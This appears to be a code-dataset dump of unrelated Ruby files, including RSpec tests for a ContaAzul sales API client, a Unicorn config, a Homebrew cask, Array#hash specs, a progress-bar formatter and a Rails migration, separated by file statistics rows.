expect(sale_removed).to be_falsey
end
end
describe '.delete!' do
it 'removes a sale based on provided id' do
stub_request(:delete, "https://api.contaazul.com/v1/sales/c7288c09-829d-48b9-aee2-4f744e380587").
to_return(status: 204, body: 'Sale deleted')
sale_removed = ContaAzulApi::Sale.delete!(id: 'c7288c09-829d-48b9-aee2-4f744e380587')
expect(sale_removed).to be_truthy
end
it 'raises an error when sale is not found' do
stub_request(:delete, "https://api.contaazul.com/v1/sales/c7288c09-829d-48b9-aee2-4f744e380587").
to_return(status: 404, body: 'Sale not found with specified id')
expect {
ContaAzulApi::Sale.delete!(id: 'c7288c09-829d-48b9-aee2-4f744e380587')
}.to raise_exception(ContaAzulApi::Sale::NotDeleted)
end
end
end
| 35.833333 | 106 | 0.671662 |
ab73699a44cacf4efb50b31685cb6943d517bb1f | 162 | # frozen_string_literal: true
require "workbook/cell"
module Workbook
module Types
class Numeric < Numeric
include Workbook::Cell
end
end
end
| 13.5 | 29 | 0.716049 |
0353ae9db7927ece1418bfc10117127828554d14 | 245 | working_directory "/home/root/furtively/current"
pid "/home/root/furtively/shared/pids/unicorn.pid"
stderr_path "/home/root/furtively/shared/log/unicorn.log"
stdout_path "/home/root/furtively/shared/log/unicorn.log"
worker_processes 2
timeout 30 | 40.833333 | 57 | 0.820408 |
4a749293a2114644222e554e7581bdbed394b841 | 497 | cask 'iexplorer' do
version '3.9.8.0'
sha256 '93a9a6e9ba083dcffc22c8f02aa17576d456a6cccce2a423f6c41497bdd9135f'
url "https://www.macroplant.com/release/iExplorer-#{version}.dmg"
appcast 'https://www.macroplant.com/iexplorer/ie3-appcast.xml',
checkpoint: '5681a4d7b14edacfc86a43ad3929b4b798e6ecc30db80f7f58e40bac0746ec65'
name 'iExplorer'
homepage 'https://www.macroplant.com/iexplorer/'
license :freemium
depends_on macos: '>= :snow_leopard'
app 'iExplorer.app'
end
| 31.0625 | 88 | 0.7666 |
26f557057ad524d7af98c918029603379d1a6ec9 | 2,360 | require File.expand_path('../../../spec_helper', __FILE__)
require File.expand_path('../fixtures/classes', __FILE__)
describe "Array#hash" do
it "returns the same fixnum for arrays with the same content" do
[].respond_to?(:hash).should == true
[[], [1, 2, 3]].each do |ary|
ary.hash.should == ary.dup.hash
ary.hash.should be_an_instance_of(Fixnum)
end
end
it "properly handles recursive arrays" do
empty = ArraySpecs.empty_recursive_array
empty.hash.should be_kind_of(Fixnum)
array = ArraySpecs.recursive_array
array.hash.should be_kind_of(Fixnum)
end
it "returns the same hash for equal recursive arrays" do
rec = []; rec << rec
rec.hash.should == [rec].hash
rec.hash.should == [[rec]].hash
# This is because rec.eql?([[rec]])
# Remember that if two objects are eql?
# then they need to have the same hash
# Check the Array#eql? specs!
end
it "returns the same hash for equal recursive arrays through hashes" do
h = {} ; rec = [h] ; h[:x] = rec
rec.hash.should == [h].hash
rec.hash.should == [{:x => rec}].hash
# Like above, this is because rec.eql?([{:x => rec}])
end
# Too much of an implementation detail? -rue
not_compliant_on :rubinius, :opal do
it "calls to_int on result of calling hash on each element" do
ary = Array.new(5) do
# Can't use should_receive here because it calls hash()
obj = mock('0')
def obj.hash()
def self.to_int() freeze; 0 end
return self
end
obj
end
ary.hash
ary.each { |obj| obj.frozen?.should == true }
hash = mock('1')
hash.should_receive(:to_int).and_return(1.hash)
obj = mock('@hash')
obj.instance_variable_set(:@hash, hash)
def obj.hash() @hash end
[obj].hash.should == [1].hash
end
end
it "ignores array class differences" do
ArraySpecs::MyArray[].hash.should == [].hash
ArraySpecs::MyArray[1, 2].hash.should == [1, 2].hash
end
it "returns same hash code for arrays with the same content" do
a = [1, 2, 3, 4]
a.fill 'a', 0..3
b = %w|a a a a|
a.hash.should == b.hash
end
it "returns the same value if arrays are #eql?" do
a = [1, 2, 3, 4]
a.fill 'a', 0..3
b = %w|a a a a|
a.hash.should == b.hash
a.should eql(b)
end
end
| 27.44186 | 73 | 0.609322 |
0392832b5eadd3d0c92c9c2c8983ea357e64ae7a | 788 | class ProgressBar
module Format
class String < ::String
MOLECULE_PATTERN = /%[a-zA-Z]/
ANSI_SGR_PATTERN = /\e\[[\d;]+m/
def displayable_length
gsub(ANSI_SGR_PATTERN, '').length
end
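# For example, SGR color sequences do not count toward the width:
#
#   Format::String.new("\e[32mok\e[0m").displayable_length # => 2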
def bar_molecule_placeholder_length
@bar_molecule_placeholder_length ||= bar_molecules.size * 2
end
def non_bar_molecules
@non_bar_molecules ||= molecules.select(&:non_bar_molecule?)
end
def bar_molecules
@bar_molecules ||= molecules.select(&:bar_molecule?)
end
def molecules
@molecules ||= begin
molecules = []
scan(MOLECULE_PATTERN) do |match|
molecules << Molecule.new(match[1, 1])
end
molecules
end
end
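# For example, "%t: |%B|" contains two molecules (%t and %B); the other
# characters are literal text:
#
#   Format::String.new("%t: |%B|").molecules.length # => 2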
end
end
end
| 21.297297 | 64 | 0.591371 |
acbb1b5f9244c0dd4a7eef848c2bf5db18b31b64 | 164 | class AddIndexUniqueToUsageLimitsAgain < ActiveRecord::Migration
def change
add_index(:usage_limits, [:metric_id, :plan_id, :period], unique: true)
end
end
| 27.333333 | 75 | 0.768293 |